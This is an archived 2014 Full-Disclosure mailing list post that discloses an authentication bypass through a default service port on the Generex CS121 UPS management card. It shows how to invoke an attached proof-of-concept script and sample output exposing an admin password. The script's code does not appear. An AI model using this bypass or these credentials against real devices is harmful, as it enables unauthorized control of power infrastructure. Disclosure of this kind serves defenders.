lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <N1-LxSxbiUn2a@Safe-mail.net>
Date: Thu, 15 May 2014 16:25:23 -0400
From: jkmac@...e-mail.net
To: fulldisclosure@...lists.org
Subject: [FD] UPS Web/SNMP-Manager CS121 authentication bypass,
	credentials leak, ...

UPS Web/SNMP-Manager CS121 by Generex comes in with a default enabled "service"-port, that makes it possible to bypass any specified login for HTTP(s), snmp or telnet. 

CS121 is a widely used management card in ups systems from Legrand, Rittal, Eaton,  AEG, Masterguard....

Attached is a poc, found and proofed on Legrand ups with different firmware releases. If you are hardcore enough, you may also flash your own HyNetOS-firmware and take over the world ;-)


./upssearch.pl   $IP

UPS: <VERSION> CS124-16M32M, ROM-Version: 2.3.4(pduc) - Aug 27, 2010 

Target system parameters (current):
Default Protocol : TCP/IP
Default Driver   : Ethernet
Mac address      : 00-03-05-00-00-00
IP address       : XX.XX.XX.XX
Net Mask         : 255.255.255.192
Default Gateway  : XX.XX.XX.XX
DHCP             : 0.0.0.0
DNS              : 0.0.0.0
Port for tools   : 4000


Searching login
USER: admin, PASS: hg478wegzsu, ACCOUNT: none

Regards.

View attachment "upssearch-pl.txt" of type "text/plain" (746 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ